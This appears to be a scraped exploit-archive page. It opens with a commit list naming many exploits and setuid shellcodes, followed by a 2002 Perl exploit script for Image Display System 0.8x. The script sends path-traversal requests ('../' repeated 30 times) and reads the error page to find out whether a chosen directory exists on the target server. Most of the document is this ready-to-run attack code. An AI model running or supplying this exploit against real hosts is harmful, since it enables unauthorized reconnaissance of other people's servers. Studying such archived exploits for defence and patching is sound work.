880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
96 lines
No EOL
2.2 KiB
Perl
Executable file
96 lines
No EOL
2.2 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/4870/info
|
|
|
|
IDS (Image Display System) is an web based photo album application written in Perl. IDS is freely available and is maintained by Ashley M. Kirchner.
|
|
|
|
Users can confirm the existence and location of various directories residing on the IDS host. This is accomplished when a request for a directory and album name is sent to the host containing numerous '../' character sequences. The error page returned will indicate to the attacker whether the specified path is a valid directory or not.
|
|
|
|
#!/usr/bin/perl -w
|
|
#
|
|
# ids-inform.pl (05/27/2002)
|
|
#
|
|
# Image Display System 0.8x Information Disclosure Exploit.
|
|
# Checks for existance of specified directory.
|
|
#
|
|
# By: isox [isox@chainsawbeer.com]
|
|
#
|
|
#
|
|
# usage: self explanitory
|
|
#
|
|
# my spelling: bad
|
|
#
|
|
# Hi Cody, You should be proud, I coded for you!
|
|
# Hi YpCat, Your perl is k-rad and pheersom.
|
|
#
|
|
#######
|
|
# URL #
|
|
#######
|
|
# http://0xc0ffee.com
|
|
# http://hhp-programming.net
|
|
#
|
|
#
|
|
#################
|
|
# Advertisement #
|
|
#################
|
|
#
|
|
# Going to Defcon X this year? Well come to the one and only Dennys at Defcon breakfast.
|
|
# This is quickly becoming a yearly tradition put on by isox. Check 0xc0ffee.com for
|
|
# more information.
|
|
#
|
|
|
|
$maxdepth = 30;
|
|
|
|
&Banner;
|
|
|
|
if ($#ARGV < 3) {
|
|
die("Usage $0 <directory> <http://host/path/to/index.cgi> <host> <port>\n");
|
|
}
|
|
|
|
for($t=0; $t<$maxdepth; $t++) {
|
|
$dotdot = "$dotdot" . "/..";
|
|
}
|
|
|
|
$query = "GET $ARGV[1]" . "?mode=album&album=$dotdot/$ARGV[0]\n\n";
|
|
$blahblah = &Directory($query, $ARGV[2], $ARGV[3]);
|
|
|
|
if($blahblah =~ /Sorry, invalid directory name/) {
|
|
print("$ARGV[0] Exists.\n");
|
|
} else {
|
|
print("$ARGV[0] Does Not Exist.\n");
|
|
}
|
|
|
|
exit 0;
|
|
|
|
|
|
|
|
|
|
sub Banner {
|
|
print("IDS Information Disclosure Exploit\n");
|
|
print("Written by isox [isox\@chainsawbeer.com]\n\n");
|
|
}
|
|
|
|
|
|
sub Directory {
|
|
use IO::Socket::INET;
|
|
|
|
my($query, $host, $port) = @_;
|
|
|
|
$sock = new IO::Socket::INET (
|
|
PeerAddr => $host,
|
|
PeerPort => $port,
|
|
Timeout => 8,
|
|
Proto => 'tcp'
|
|
);
|
|
|
|
if(!$sock) {
|
|
die("sock: timed out\n");
|
|
}
|
|
|
|
|
|
print $sock $query;
|
|
read($sock, $buf, 8192);
|
|
close($sock);
|
|
|
|
return $buf;
|
|
}
|
|
|
|
<-- EOF --> |